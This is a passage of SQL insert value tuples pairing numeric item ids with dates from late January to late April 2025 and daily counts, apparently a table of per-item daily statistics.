(840,0,'20250128',1),
(14,0,'20250128',3),
(14,0,'20250129',5),
(469,0,'20250130',1),
(14,0,'20250130',6),
(355,0,'20250131',1),
(362,0,'20250131',1),
(563,0,'20250131',1),
(605,0,'20250131',1),
(643,0,'20250131',1),
(716,0,'20250131',1),
(741,0,'20250131',1),
(776,0,'20250131',1),
(784,0,'20250131',1),
(14,0,'20250131',7),
(362,0,'20250201',2),
(459,0,'20250201',2),
(476,0,'20250201',2),
(484,0,'20250201',2),
(496,0,'20250201',2),
(506,0,'20250201',2),
(546,0,'20250201',2),
(563,0,'20250201',2),
(566,0,'20250201',2),
(605,0,'20250201',2),
(609,0,'20250201',2),
(643,0,'20250201',2),
(650,0,'20250201',2),
(656,0,'20250201',2),
(680,0,'20250201',2),
(700,0,'20250201',2),
(703,0,'20250201',2),
(708,0,'20250201',2),
(712,0,'20250201',2),
(716,0,'20250201',2),
(741,0,'20250201',2),
(771,0,'20250201',2),
(776,0,'20250201',2),
(780,0,'20250201',2),
(784,0,'20250201',2),
(810,0,'20250201',2),
(824,0,'20250201',2),
(828,0,'20250201',2),
(831,0,'20250201',2),
(836,0,'20250201',2),
(840,0,'20250201',2),
(851,0,'20250201',2),
(855,0,'20250201',2),
(859,0,'20250201',2),
(871,0,'20250201',2),
(900,0,'20250201',2),
(1003,0,'20250201',2),
(1010,0,'20250201',2),
(1016,0,'20250201',2),
(1020,0,'20250201',2),
(1032,0,'20250201',2),
(1036,0,'20250201',2),
(1052,0,'20250201',2),
(1059,0,'20250201',2),
(469,0,'20250201',3),
(542,0,'20250201',3),
(748,0,'20250201',3),
(355,0,'20250201',18),
(14,0,'20250201',73),
(355,0,'20250202',1),
(14,0,'20250202',5),
(476,0,'20250203',1),
(680,0,'20250203',1),
(506,0,'20250203',3),
(871,0,'20250203',4),
(14,0,'20250203',5),
(362,0,'20250204',1),
(459,0,'20250204',1),
(476,0,'20250204',1),
(484,0,'20250204',1),
(496,0,'20250204',1),
(506,0,'20250204',1),
(542,0,'20250204',1),
(546,0,'20250204',1),
(563,0,'20250204',1),
(566,0,'20250204',1),
(605,0,'20250204',1),
(643,0,'20250204',1),
(650,0,'20250204',1),
(656,0,'20250204',1),
(680,0,'20250204',1),
(700,0,'20250204',1),
(703,0,'20250204',1),
(708,0,'20250204',1),
(712,0,'20250204',1),
(716,0,'20250204',1),
(741,0,'20250204',1),
(748,0,'20250204',1),
(771,0,'20250204',1),
(776,0,'20250204',1),
(780,0,'20250204',1),
(784,0,'20250204',1),
(810,0,'20250204',1),
(824,0,'20250204',1),
(828,0,'20250204',1),
(831,0,'20250204',1),
(836,0,'20250204',1),
(840,0,'20250204',1),
(851,0,'20250204',1),
(855,0,'20250204',1),
(859,0,'20250204',1),
(871,0,'20250204',1),
(900,0,'20250204',1),
(1003,0,'20250204',1),
(1010,0,'20250204',1),
(1016,0,'20250204',1),
(1020,0,'20250204',1),
(1032,0,'20250204',1),
(1036,0,'20250204',1),
(1052,0,'20250204',1),
(1059,0,'20250204',1),
(469,0,'20250204',2),
(609,0,'20250204',2),
(355,0,'20250204',17),
(14,0,'20250204',37),
(362,0,'20250205',2),
(459,0,'20250205',2),
(476,0,'20250205',2),
(484,0,'20250205',2),
(506,0,'20250205',2),
(542,0,'20250205',2),
(546,0,'20250205',2),
(563,0,'20250205',2),
(566,0,'20250205',2),
(605,0,'20250205',2),
(609,0,'20250205',2),
(643,0,'20250205',2),
(650,0,'20250205',2),
(656,0,'20250205',2),
(680,0,'20250205',2),
(700,0,'20250205',2),
(703,0,'20250205',2),
(708,0,'20250205',2),
(712,0,'20250205',2),
(716,0,'20250205',2),
(741,0,'20250205',2),
(748,0,'20250205',2),
(771,0,'20250205',2),
(776,0,'20250205',2),
(780,0,'20250205',2),
(784,0,'20250205',2),
(810,0,'20250205',2),
(824,0,'20250205',2),
(828,0,'20250205',2),
(836,0,'20250205',2),
(840,0,'20250205',2),
(851,0,'20250205',2),
(855,0,'20250205',2),
(859,0,'20250205',2),
(900,0,'20250205',2),
(1020,0,'20250205',2),
(1032,0,'20250205',2),
(1036,0,'20250205',2),
(1052,0,'20250205',2),
(1059,0,'20250205',2),
(469,0,'20250205',3),
(496,0,'20250205',3),
(831,0,'20250205',3),
(1003,0,'20250205',3),
(1010,0,'20250205',3),
(1016,0,'20250205',3),
(871,0,'20250205',4),
(355,0,'20250205',18),
(14,0,'20250205',73),
(476,0,'20250206',1),
(496,0,'20250206',1),
(609,0,'20250206',1),
(650,0,'20250206',1),
(14,0,'20250206',6),
(14,0,'20250207',1),
(355,0,'20250207',1),
(362,0,'20250207',1),
(476,0,'20250207',1),
(496,0,'20250207',1),
(605,0,'20250207',1),
(643,0,'20250207',1),
(700,0,'20250207',1),
(771,0,'20250207',1),
(828,0,'20250207',1),
(859,0,'20250207',1),
(1010,0,'20250207',1),
(1036,0,'20250207',1),
(1052,0,'20250207',2),
(810,0,'20250208',1),
(824,0,'20250208',1),
(859,0,'20250208',1),
(14,0,'20250208',3),
(484,0,'20250209',1),
(542,0,'20250209',1),
(563,0,'20250209',1),
(656,0,'20250209',1),
(716,0,'20250209',1),
(741,0,'20250209',1),
(748,0,'20250209',1),
(810,0,'20250209',1),
(851,0,'20250209',1),
(871,0,'20250209',1),
(14,0,'20250209',3),
(355,0,'20250210',1),
(362,0,'20250210',1),
(484,0,'20250210',1),
(605,0,'20250210',1),
(609,0,'20250210',1),
(643,0,'20250210',1),
(650,0,'20250210',1),
(700,0,'20250210',1),
(716,0,'20250210',1),
(741,0,'20250210',1),
(776,0,'20250210',1),
(855,0,'20250210',1),
(1036,0,'20250210',1),
(1059,0,'20250210',2),
(14,0,'20250210',12),
(469,0,'20250211',1),
(650,0,'20250211',1),
(14,0,'20250211',6),
(362,0,'20250212',1),
(605,0,'20250212',1),
(609,0,'20250212',1),
(712,0,'20250212',1),
(859,0,'20250212',1),
(459,0,'20250212',2),
(476,0,'20250212',2),
(484,0,'20250212',2),
(496,0,'20250212',2),
(506,0,'20250212',2),
(542,0,'20250212',2),
(546,0,'20250212',2),
(563,0,'20250212',2),
(566,0,'20250212',2),
(643,0,'20250212',2),
(650,0,'20250212',2),
(656,0,'20250212',2),
(680,0,'20250212',2),
(700,0,'20250212',2),
(703,0,'20250212',2),
(708,0,'20250212',2),
(716,0,'20250212',2),
(741,0,'20250212',2),
(748,0,'20250212',2),
(771,0,'20250212',2),
(776,0,'20250212',2),
(780,0,'20250212',2),
(784,0,'20250212',2),
(810,0,'20250212',2),
(824,0,'20250212',2),
(828,0,'20250212',2),
(831,0,'20250212',2),
(836,0,'20250212',2),
(840,0,'20250212',2),
(851,0,'20250212',2),
(855,0,'20250212',2),
(871,0,'20250212',2),
(900,0,'20250212',2),
(1003,0,'20250212',2),
(1010,0,'20250212',2),
(1016,0,'20250212',2),
(1020,0,'20250212',2),
(1032,0,'20250212',2),
(1036,0,'20250212',2),
(1052,0,'20250212',2),
(1059,0,'20250212',2),
(469,0,'20250212',3),
(355,0,'20250212',17),
(14,0,'20250212',54),
(14,0,'20250213',1),
(712,0,'20250213',1),
(831,0,'20250213',1),
(836,0,'20250213',1),
(900,0,'20250213',1),
(1032,0,'20250213',1),
(469,0,'20250213',2),
(643,0,'20250214',1),
(828,0,'20250214',1),
(1020,0,'20250214',1),
(1059,0,'20250214',1),
(355,0,'20250214',2),
(14,0,'20250214',11),
(362,0,'20250215',1),
(469,0,'20250215',1),
(605,0,'20250215',1),
(609,0,'20250215',1),
(643,0,'20250215',1),
(703,0,'20250215',1),
(771,0,'20250215',1),
(14,0,'20250215',2),
(459,0,'20250216',1),
(566,0,'20250216',1),
(656,0,'20250216',1),
(700,0,'20250216',1),
(708,0,'20250216',1),
(355,0,'20250216',4),
(14,0,'20250216',10),
(14,0,'20250217',1),
(362,0,'20250217',1),
(469,0,'20250217',1),
(506,0,'20250217',1),
(546,0,'20250217',1),
(780,0,'20250217',1),
(840,0,'20250217',1),
(605,0,'20250218',1),
(355,0,'20250218',3),
(14,0,'20250218',6),
(14,0,'20250219',5),
(716,0,'20250220',1),
(741,0,'20250220',1),
(784,0,'20250220',1),
(14,0,'20250220',6),
(542,0,'20250221',1),
(563,0,'20250221',1),
(748,0,'20250221',1),
(776,0,'20250221',1),
(784,0,'20250221',1),
(871,0,'20250221',1),
(14,0,'20250221',23),
(476,0,'20250222',1),
(484,0,'20250222',1),
(14,0,'20250222',9),
(355,0,'20250223',1),
(362,0,'20250223',1),
(469,0,'20250223',1),
(476,0,'20250223',1),
(484,0,'20250223',1),
(496,0,'20250223',1),
(542,0,'20250223',1),
(546,0,'20250223',1),
(563,0,'20250223',1),
(566,0,'20250223',1),
(605,0,'20250223',1),
(609,0,'20250223',1),
(643,0,'20250223',1),
(650,0,'20250223',1),
(656,0,'20250223',1),
(680,0,'20250223',1),
(700,0,'20250223',1),
(703,0,'20250223',1),
(708,0,'20250223',1),
(712,0,'20250223',1),
(716,0,'20250223',1),
(741,0,'20250223',1),
(748,0,'20250223',1),
(771,0,'20250223',1),
(776,0,'20250223',1),
(780,0,'20250223',1),
(784,0,'20250223',1),
(828,0,'20250223',1),
(831,0,'20250223',1),
(840,0,'20250223',1),
(851,0,'20250223',1),
(855,0,'20250223',1),
(859,0,'20250223',1),
(871,0,'20250223',1),
(900,0,'20250223',1),
(1003,0,'20250223',1),
(1010,0,'20250223',1),
(1016,0,'20250223',1),
(1020,0,'20250223',1),
(1032,0,'20250223',1),
(1036,0,'20250223',1),
(1052,0,'20250223',1),
(1059,0,'20250223',1),
(506,0,'20250223',2),
(14,0,'20250223',15),
(362,0,'20250224',1),
(476,0,'20250224',1),
(484,0,'20250224',1),
(496,0,'20250224',1),
(506,0,'20250224',1),
(542,0,'20250224',1),
(563,0,'20250224',1),
(566,0,'20250224',1),
(605,0,'20250224',1),
(609,0,'20250224',1),
(643,0,'20250224',1),
(656,0,'20250224',1),
(700,0,'20250224',1),
(703,0,'20250224',1),
(708,0,'20250224',1),
(712,0,'20250224',1),
(716,0,'20250224',1),
(741,0,'20250224',1),
(748,0,'20250224',1),
(771,0,'20250224',1),
(776,0,'20250224',1),
(780,0,'20250224',1),
(784,0,'20250224',1),
(828,0,'20250224',1),
(831,0,'20250224',1),
(840,0,'20250224',1),
(851,0,'20250224',1),
(855,0,'20250224',1),
(859,0,'20250224',1),
(871,0,'20250224',1),
(900,0,'20250224',1),
(1003,0,'20250224',1),
(1010,0,'20250224',1),
(1016,0,'20250224',1),
(1020,0,'20250224',1),
(1032,0,'20250224',1),
(1036,0,'20250224',1),
(1052,0,'20250224',1),
(1059,0,'20250224',1),
(459,0,'20250224',2),
(546,0,'20250224',2),
(650,0,'20250224',2),
(680,0,'20250224',2),
(810,0,'20250224',2),
(824,0,'20250224',2),
(836,0,'20250224',2),
(469,0,'20250224',4),
(355,0,'20250224',17),
(14,0,'20250224',63),
(14,0,'20250225',1),
(871,0,'20250225',1),
(1003,0,'20250225',1),
(1010,0,'20250225',1),
(1016,0,'20250225',1),
(476,0,'20250226',1),
(609,0,'20250226',1),
(831,0,'20250226',1),
(1016,0,'20250226',1),
(496,0,'20250226',2),
(14,0,'20250226',12),
(362,0,'20250227',1),
(459,0,'20250227',1),
(469,0,'20250227',1),
(566,0,'20250227',1),
(656,0,'20250227',1),
(776,0,'20250227',1),
(810,0,'20250227',1),
(1010,0,'20250227',1),
(828,0,'20250227',2),
(476,0,'20250228',1),
(546,0,'20250228',1),
(609,0,'20250228',1),
(680,0,'20250228',1),
(703,0,'20250228',1),
(708,0,'20250228',1),
(712,0,'20250228',1),
(776,0,'20250228',1),
(780,0,'20250228',1),
(810,0,'20250228',1),
(824,0,'20250228',1),
(828,0,'20250228',1),
(831,0,'20250228',1),
(836,0,'20250228',1),
(855,0,'20250228',1),
(900,0,'20250228',1),
(1003,0,'20250228',1),
(1010,0,'20250228',1),
(1016,0,'20250228',1),
(1020,0,'20250228',1),
(1032,0,'20250228',1),
(1036,0,'20250228',1),
(14,0,'20250228',2),
(859,0,'20250228',2),
(1052,0,'20250228',2),
(362,0,'20250301',1),
(476,0,'20250301',1),
(506,0,'20250301',1),
(563,0,'20250301',1),
(609,0,'20250301',1),
(643,0,'20250301',1),
(700,0,'20250301',1),
(708,0,'20250301',1),
(741,0,'20250301',1),
(780,0,'20250301',1),
(784,0,'20250301',1),
(810,0,'20250301',1),
(824,0,'20250301',1),
(836,0,'20250301',1),
(851,0,'20250301',1),
(900,0,'20250301',1),
(1010,0,'20250301',1),
(1016,0,'20250301',1),
(1032,0,'20250301',1),
(650,0,'20250301',3),
(14,0,'20250301',6),
(355,0,'20250302',1),
(459,0,'20250302',1),
(469,0,'20250302',1),
(484,0,'20250302',1),
(496,0,'20250302',1),
(542,0,'20250302',1),
(546,0,'20250302',1),
(650,0,'20250302',1),
(656,0,'20250302',1),
(680,0,'20250302',1),
(703,0,'20250302',1),
(712,0,'20250302',1),
(716,0,'20250302',1),
(748,0,'20250302',1),
(771,0,'20250302',1),
(776,0,'20250302',1),
(780,0,'20250302',1),
(824,0,'20250302',1),
(831,0,'20250302',1),
(840,0,'20250302',1),
(851,0,'20250302',1),
(859,0,'20250302',1),
(871,0,'20250302',1),
(900,0,'20250302',1),
(1003,0,'20250302',1),
(1020,0,'20250302',1),
(1036,0,'20250302',1),
(1052,0,'20250302',1),
(1059,0,'20250302',1),
(566,0,'20250302',2),
(605,0,'20250302',2),
(828,0,'20250302',2),
(855,0,'20250302',2),
(14,0,'20250302',9),
(484,0,'20250303',1),
(656,0,'20250303',1),
(859,0,'20250303',1),
(1036,0,'20250303',1),
(14,0,'20250303',2),
(362,0,'20250303',2),
(362,0,'20250304',1),
(609,0,'20250304',1),
(643,0,'20250304',1),
(650,0,'20250304',1),
(741,0,'20250304',1),
(900,0,'20250304',1),
(14,0,'20250304',6),
(712,0,'20250305',1),
(828,0,'20250305',1),
(836,0,'20250305',1),
(1032,0,'20250305',1),
(14,0,'20250305',3),
(563,0,'20250306',1),
(643,0,'20250306',1),
(650,0,'20250306',1),
(700,0,'20250306',1),
(703,0,'20250306',1),
(748,0,'20250306',1),
(871,0,'20250306',1),
(1020,0,'20250306',1),
(1059,0,'20250306',1),
(900,0,'20250306',2),
(14,0,'20250306',3),
(708,0,'20250307',1),
(900,0,'20250307',1),
(14,0,'20250307',5),
(459,0,'20250308',1),
(609,0,'20250308',1),
(703,0,'20250308',1),
(771,0,'20250308',1),
(355,0,'20250308',2),
(650,0,'20250308',2),
(14,0,'20250308',10),
(355,0,'20250309',1),
(362,0,'20250309',1),
(469,0,'20250309',1),
(506,0,'20250309',1),
(566,0,'20250309',1),
(605,0,'20250309',1),
(656,0,'20250309',1),
(700,0,'20250309',1),
(708,0,'20250309',1),
(741,0,'20250309',1),
(780,0,'20250309',1),
(840,0,'20250309',1),
(643,0,'20250309',2),
(14,0,'20250309',8),
(506,0,'20250310',1),
(546,0,'20250310',1),
(1059,0,'20250310',1),
(355,0,'20250310',2),
(605,0,'20250310',2),
(14,0,'20250310',13),
(469,0,'20250311',1),
(650,0,'20250311',1),
(362,0,'20250311',2),
(14,0,'20250311',4),
(605,0,'20250312',1),
(716,0,'20250312',1),
(741,0,'20250312',1),
(871,0,'20250312',1),
(643,0,'20250312',2),
(14,0,'20250312',12),
(362,0,'20250313',1),
(459,0,'20250313',1),
(476,0,'20250313',1),
(484,0,'20250313',1),
(496,0,'20250313',1),
(506,0,'20250313',1),
(542,0,'20250313',1),
(546,0,'20250313',1),
(566,0,'20250313',1),
(605,0,'20250313',1),
(609,0,'20250313',1),
(643,0,'20250313',1),
(650,0,'20250313',1),
(656,0,'20250313',1),
(680,0,'20250313',1),
(700,0,'20250313',1),
(703,0,'20250313',1),
(708,0,'20250313',1),
(712,0,'20250313',1),
(716,0,'20250313',1),
(741,0,'20250313',1),
(771,0,'20250313',1),
(780,0,'20250313',1),
(810,0,'20250313',1),
(824,0,'20250313',1),
(828,0,'20250313',1),
(831,0,'20250313',1),
(836,0,'20250313',1),
(840,0,'20250313',1),
(851,0,'20250313',1),
(855,0,'20250313',1),
(859,0,'20250313',1),
(900,0,'20250313',1),
(1003,0,'20250313',1),
(1010,0,'20250313',1),
(1016,0,'20250313',1),
(1020,0,'20250313',1),
(1032,0,'20250313',1),
(1036,0,'20250313',1),
(1052,0,'20250313',1),
(1059,0,'20250313',1),
(469,0,'20250313',2),
(563,0,'20250313',2),
(748,0,'20250313',2),
(776,0,'20250313',2),
(784,0,'20250313',2),
(871,0,'20250313',2),
(355,0,'20250313',17),
(14,0,'20250313',36),
(542,0,'20250314',1),
(643,0,'20250314',2),
(14,0,'20250314',42),
(506,0,'20250315',1),
(680,0,'20250315',1),
(871,0,'20250315',1),
(355,0,'20250315',2),
(14,0,'20250315',28),
(459,0,'20250316',1),
(496,0,'20250316',1),
(542,0,'20250316',1),
(546,0,'20250316',1),
(563,0,'20250316',1),
(605,0,'20250316',1),
(609,0,'20250316',1),
(643,0,'20250316',1),
(680,0,'20250316',1),
(708,0,'20250316',1),
(716,0,'20250316',1),
(748,0,'20250316',1),
(810,0,'20250316',1),
(828,0,'20250316',1),
(831,0,'20250316',1),
(859,0,'20250316',1),
(1020,0,'20250316',1),
(14,0,'20250316',43),
(712,0,'20250317',1),
(776,0,'20250317',1),
(836,0,'20250317',1),
(1003,0,'20250317',1),
(1020,0,'20250317',1),
(14,0,'20250317',36),
(355,0,'20250318',1),
(362,0,'20250318',1),
(476,0,'20250318',1),
(496,0,'20250318',1),
(542,0,'20250318',1),
(605,0,'20250318',1),
(643,0,'20250318',1),
(716,0,'20250318',1),
(831,0,'20250318',1),
(1010,0,'20250318',1),
(1016,0,'20250318',1),
(871,0,'20250318',2),
(609,0,'20250318',4),
(14,0,'20250318',22),
(496,0,'20250319',1),
(546,0,'20250319',1),
(680,0,'20250319',1),
(776,0,'20250319',1),
(828,0,'20250319',1),
(14,0,'20250319',34),
(355,0,'20250320',1),
(609,0,'20250320',1),
(700,0,'20250320',1),
(810,0,'20250320',1),
(900,0,'20250320',1),
(1052,0,'20250320',1),
(14,0,'20250320',37),
(824,0,'20250321',1),
(851,0,'20250321',1),
(859,0,'20250321',1),
(14,0,'20250321',10),
(355,0,'20250322',1),
(546,0,'20250322',1),
(609,0,'20250322',1),
(776,0,'20250322',1),
(855,0,'20250322',1),
(14,0,'20250322',51),
(362,0,'20250323',1),
(484,0,'20250323',1),
(605,0,'20250323',1),
(741,0,'20250323',1),
(1036,0,'20250323',1),
(14,0,'20250323',9),
(362,0,'20250324',1),
(459,0,'20250324',1),
(469,0,'20250324',1),
(476,0,'20250324',1),
(484,0,'20250324',1),
(496,0,'20250324',1),
(506,0,'20250324',1),
(542,0,'20250324',1),
(546,0,'20250324',1),
(566,0,'20250324',1),
(605,0,'20250324',1),
(609,0,'20250324',1),
(680,0,'20250324',1),
(703,0,'20250324',1),
(712,0,'20250324',1),
(716,0,'20250324',1),
(741,0,'20250324',1),
(748,0,'20250324',1),
(780,0,'20250324',1),
(784,0,'20250324',1),
(810,0,'20250324',1),
(824,0,'20250324',1),
(828,0,'20250324',1),
(831,0,'20250324',1),
(840,0,'20250324',1),
(851,0,'20250324',1),
(855,0,'20250324',1),
(859,0,'20250324',1),
(871,0,'20250324',1),
(900,0,'20250324',1),
(1003,0,'20250324',1),
(1010,0,'20250324',1),
(1016,0,'20250324',1),
(1020,0,'20250324',1),
(1032,0,'20250324',1),
(1036,0,'20250324',1),
(1052,0,'20250324',1),
(1059,0,'20250324',1),
(563,0,'20250324',2),
(700,0,'20250324',2),
(708,0,'20250324',2),
(771,0,'20250324',2),
(776,0,'20250324',2),
(836,0,'20250324',2),
(355,0,'20250324',3),
(643,0,'20250324',3),
(650,0,'20250324',3),
(14,0,'20250324',12),
(484,0,'20250325',1),
(542,0,'20250325',1),
(656,0,'20250325',1),
(716,0,'20250325',1),
(748,0,'20250325',1),
(810,0,'20250325',1),
(836,0,'20250325',1),
(1032,0,'20250325',1),
(355,0,'20250325',2),
(14,0,'20250325',6),
(469,0,'20250326',1),
(643,0,'20250326',1),
(712,0,'20250326',1),
(776,0,'20250326',1),
(900,0,'20250326',1),
(1020,0,'20250326',1),
(741,0,'20250326',2),
(14,0,'20250326',3),
(362,0,'20250327',1),
(542,0,'20250327',1),
(566,0,'20250327',1),
(609,0,'20250327',1),
(703,0,'20250327',1),
(780,0,'20250327',1),
(784,0,'20250327',1),
(824,0,'20250327',1),
(871,0,'20250327',1),
(1036,0,'20250327',1),
(1059,0,'20250327',1),
(355,0,'20250327',3),
(14,0,'20250327',7),
(703,0,'20250328',1),
(14,0,'20250328',8),
(459,0,'20250329',1),
(609,0,'20250329',1),
(656,0,'20250329',1),
(700,0,'20250329',1),
(708,0,'20250329',1),
(741,0,'20250329',1),
(771,0,'20250329',1),
(776,0,'20250329',1),
(506,0,'20250329',2),
(14,0,'20250329',3),
(355,0,'20250329',3),
(355,0,'20250330',1),
(469,0,'20250330',1),
(546,0,'20250330',1),
(609,0,'20250330',1),
(840,0,'20250330',1),
(14,0,'20250330',8),
(14,0,'20250331',1),
(355,0,'20250331',3),
(355,0,'20250401',1),
(546,0,'20250401',1),
(563,0,'20250401',1),
(566,0,'20250401',1),
(609,0,'20250401',1),
(650,0,'20250401',1),
(776,0,'20250401',1),
(14,0,'20250401',3),
(741,0,'20250401',3),
(355,0,'20250402',1),
(484,0,'20250402',1),
(496,0,'20250402',1),
(506,0,'20250402',1),
(609,0,'20250402',1),
(716,0,'20250402',1),
(748,0,'20250402',1),
(776,0,'20250402',1),
(780,0,'20250402',1),
(784,0,'20250402',1),
(563,0,'20250402',2),
(650,0,'20250402',2),
(643,0,'20250402',3),
(14,0,'20250402',6),
(459,0,'20250403',1),
(542,0,'20250403',1),
(605,0,'20250403',1),
(708,0,'20250403',1),
(712,0,'20250403',1),
(855,0,'20250403',1),
(1010,0,'20250403',1),
(1016,0,'20250403',1),
(355,0,'20250403',3),
(14,0,'20250403',6),
(355,0,'20250404',1),
(469,0,'20250404',1),
(484,0,'20250404',1),
(609,0,'20250404',1),
(741,0,'20250404',1),
(776,0,'20250404',1),
(14,0,'20250404',5),
(680,0,'20250405',1),
(771,0,'20250405',1),
(355,0,'20250405',2),
(14,0,'20250405',16),
(355,0,'20250406',1),
(609,0,'20250406',1),
(680,0,'20250406',1),
(741,0,'20250406',1),
(776,0,'20250406',1),
(780,0,'20250406',1),
(14,0,'20250406',6),
(476,0,'20250407',1),
(496,0,'20250407',1),
(609,0,'20250407',1),
(831,0,'20250407',1),
(871,0,'20250407',1),
(1010,0,'20250407',1),
(1016,0,'20250407',1),
(355,0,'20250407',2),
(1003,0,'20250407',2),
(14,0,'20250407',4),
(506,0,'20250408',1),
(605,0,'20250408',1),
(643,0,'20250408',1),
(656,0,'20250408',1),
(828,0,'20250408',1),
(871,0,'20250408',1),
(362,0,'20250408',3),
(650,0,'20250408',3),
(14,0,'20250408',10),
(469,0,'20250409',1),
(546,0,'20250409',1),
(609,0,'20250409',1),
(650,0,'20250409',1),
(700,0,'20250409',1),
(741,0,'20250409',1),
(776,0,'20250409',1),
(836,0,'20250409',1),
(840,0,'20250409',1),
(1052,0,'20250409',1),
(355,0,'20250409',3),
(14,0,'20250409',50),
(484,0,'20250410',1),
(605,0,'20250410',1),
(609,0,'20250410',1),
(810,0,'20250410',1),
(824,0,'20250410',1),
(851,0,'20250410',1),
(859,0,'20250410',1),
(871,0,'20250410',1),
(14,0,'20250410',13),
(355,0,'20250411',1),
(362,0,'20250411',1),
(476,0,'20250411',1),
(546,0,'20250411',1),
(609,0,'20250411',1),
(643,0,'20250411',1),
(680,0,'20250411',1),
(703,0,'20250411',1),
(708,0,'20250411',1),
(712,0,'20250411',1),
(741,0,'20250411',1),
(780,0,'20250411',1),
(824,0,'20250411',1),
(828,0,'20250411',1),
(831,0,'20250411',1),
(836,0,'20250411',1),
(855,0,'20250411',1),
(859,0,'20250411',1),
(900,0,'20250411',1),
(1003,0,'20250411',1),
(1010,0,'20250411',1),
(1016,0,'20250411',1),
(1020,0,'20250411',1),
(1032,0,'20250411',1),
(1036,0,'20250411',1),
(1052,0,'20250411',1),
(776,0,'20250411',2),
(14,0,'20250411',29),
(362,0,'20250412',1),
(605,0,'20250412',1),
(776,0,'20250412',1),
(851,0,'20250412',1),
(855,0,'20250412',1),
(1052,0,'20250412',1),
(355,0,'20250412',2),
(14,0,'20250412',18),
(355,0,'20250413',1),
(484,0,'20250413',1),
(566,0,'20250413',1),
(609,0,'20250413',1),
(741,0,'20250413',1),
(776,0,'20250413',1),
(1036,0,'20250413',1),
(14,0,'20250413',15),
(469,0,'20250414',1),
(496,0,'20250414',1),
(650,0,'20250414',1),
(836,0,'20250414',1),
(355,0,'20250414',2),
(14,0,'20250414',5),
(355,0,'20250415',1),
(712,0,'20250415',1),
(784,0,'20250415',1),
(1032,0,'20250415',1),
(1059,0,'20250415',1),
(14,0,'20250415',2),
(14,0,'20250416',1),
(469,0,'20250416',1),
(476,0,'20250416',1),
(643,0,'20250416',1),
(708,0,'20250416',1),
(741,0,'20250416',1),
(776,0,'20250416',1),
(900,0,'20250416',1),
(1020,0,'20250416',1),
(1059,0,'20250416',1),
(609,0,'20250416',2),
(355,0,'20250416',3),
(362,0,'20250417',2),
(476,0,'20250417',2),
(484,0,'20250417',2),
(496,0,'20250417',2),
(506,0,'20250417',2),
(542,0,'20250417',2),
(546,0,'20250417',2),
(563,0,'20250417',2),
(566,0,'20250417',2),
(609,0,'20250417',2),
(643,0,'20250417',2),
(650,0,'20250417',2),
(656,0,'20250417',2),
(680,0,'20250417',2),
(700,0,'20250417',2),
(708,0,'20250417',2),
(712,0,'20250417',2),
(716,0,'20250417',2),
(741,0,'20250417',2),
(748,0,'20250417',2),
(771,0,'20250417',2),
(776,0,'20250417',2),
(780,0,'20250417',2),
(810,0,'20250417',2),
(824,0,'20250417',2),
(828,0,'20250417',2),
(831,0,'20250417',2),
(840,0,'20250417',2),
(851,0,'20250417',2),
(855,0,'20250417',2),
(859,0,'20250417',2),
(871,0,'20250417',2),
(900,0,'20250417',2),
(1003,0,'20250417',2),
(1016,0,'20250417',2),
(1020,0,'20250417',2),
(1032,0,'20250417',2),
(1036,0,'20250417',2),
(1052,0,'20250417',2),
(1059,0,'20250417',2),
(459,0,'20250417',3),
(469,0,'20250417',3),
(703,0,'20250417',3),
(784,0,'20250417',3),
(836,0,'20250417',3),
(1010,0,'20250417',3),
(605,0,'20250417',5),
(355,0,'20250417',18),
(14,0,'20250417',75),
(362,0,'20250418',1),
(469,0,'20250418',1),
(476,0,'20250418',1),
(484,0,'20250418',1),
(496,0,'20250418',1),
(506,0,'20250418',1),
(542,0,'20250418',1),
(546,0,'20250418',1),
(563,0,'20250418',1),
(566,0,'20250418',1),
(643,0,'20250418',1),
(650,0,'20250418',1),
(700,0,'20250418',1),
(703,0,'20250418',1),
(708,0,'20250418',1),
(712,0,'20250418',1),
(741,0,'20250418',1),
(780,0,'20250418',1),
(784,0,'20250418',1),
(824,0,'20250418',1),
(871,0,'20250418',1),
(459,0,'20250418',2),
(605,0,'20250418',2),
(609,0,'20250418',2),
(656,0,'20250418',2),
(771,0,'20250418',2),
(776,0,'20250418',2),
(355,0,'20250418',4),
(14,0,'20250418',9),
(362,0,'20250419',2),
(459,0,'20250419',2),
(476,0,'20250419',2),
(484,0,'20250419',2),
(496,0,'20250419',2),
(542,0,'20250419',2),
(546,0,'20250419',2),
(563,0,'20250419',2),
(609,0,'20250419',2),
(643,0,'20250419',2),
(656,0,'20250419',2),
(703,0,'20250419',2),
(771,0,'20250419',2),
(776,0,'20250419',2),
(784,0,'20250419',2),
(871,0,'20250419',2),
(506,0,'20250419',3),
(566,0,'20250419',3),
(605,0,'20250419',3),
(650,0,'20250419',3),
(680,0,'20250419',3),
(700,0,'20250419',3),
(712,0,'20250419',3),
(748,0,'20250419',3),
(780,0,'20250419',3),
(810,0,'20250419',3),
(824,0,'20250419',3),
(831,0,'20250419',3),
(836,0,'20250419',3),
(851,0,'20250419',3),
(855,0,'20250419',3),
(1003,0,'20250419',3),
(1010,0,'20250419',3),
(1016,0,'20250419',3),
(1020,0,'20250419',3),
(1032,0,'20250419',3),
(1052,0,'20250419',3),
(1059,0,'20250419',3),
(708,0,'20250419',4),
(716,0,'20250419',4),
(741,0,'20250419',4),
(828,0,'20250419',4),
(840,0,'20250419',4),
(859,0,'20250419',4),
(900,0,'20250419',4),
(1036,0,'20250419',4),
(469,0,'20250419',6),
(355,0,'20250419',23),
(14,0,'20250419',78),
(362,0,'20250420',1),
(546,0,'20250420',1),
(605,0,'20250420',1),
(643,0,'20250420',1),
(708,0,'20250420',1),
(741,0,'20250420',1),
(776,0,'20250420',1),
(609,0,'20250420',2),
(355,0,'20250420',4),
(14,0,'20250420',5),
(776,0,'20250421',1),
(831,0,'20250421',1),
(836,0,'20250421',1),
(1032,0,'20250421',1),
(355,0,'20250421',2),
(563,0,'20250422',1),
(566,0,'20250422',1),
(716,0,'20250422',1),
(748,0,'20250422',1),
(780,0,'20250422',1),
(784,0,'20250422',1),
(859,0,'20250422',1),
(1036,0,'20250422',1),
(355,0,'20250422',2),
(609,0,'20250422',2),
(741,0,'20250422',2),
(776,0,'20250422',2),
(14,0,'20250422',12),
(362,0,'20250423',1),
(469,0,'20250423',1),
(476,0,'20250423',1),
(484,0,'20250423',1),
(496,0,'20250423',1),
(506,0,'20250423',1),
(546,0,'20250423',1),
(563,0,'20250423',1),
(605,0,'20250423',1),
(609,0,'20250423',1),
(643,0,'20250423',1),
(650,0,'20250423',1),
(656,0,'20250423',1),
(780,0,'20250423',1),
(824,0,'20250423',1),
(871,0,'20250423',1),
(542,0,'20250423',2),
(355,0,'20250423',5),
